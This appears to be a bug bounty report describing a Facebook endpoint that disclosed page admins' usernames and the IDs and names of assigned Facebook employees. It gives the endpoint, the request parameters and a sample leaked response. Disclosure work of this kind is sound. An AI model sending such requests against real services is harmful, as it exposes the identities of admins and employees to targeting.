Description

This bug could allow an attacker to disclose the username of a page admin by only supplying the id of the targeted page. This happens because a certain endpoint would disclose the username of the admin who signed the TOS for having a page sticker (blue tick) or a page that uses Fan subscription ( gaming pages ). Also, the same endpoint leaked the ID and name of the Facebook employee assigned to help the page. This would allowed a malicious user to target a list of verified pages which would disclose a big list of employees Facebook accounts.

Reproduction

Send a POST request to https://www.facebook.com/media/manager/fan_sticker_props/ with required parameters like __a and fb_dtsg in the body of the request along with the parameter:
page_id: which would be the id of the targeted page

This request would return the following response:

"payload":{"pageID":PAGE_ID,"pageName":"PAGE_NAME","spmMemberID":"EMPLOYEE_ID","spmMemberName":"EMPLOYEE_NAME","tosAcceptTime":"TIME","tosAcceptUserName":"USERNAME","stickerURL":null,"stickerDescription":null,"stickerFeedback":null,"stickerState":null}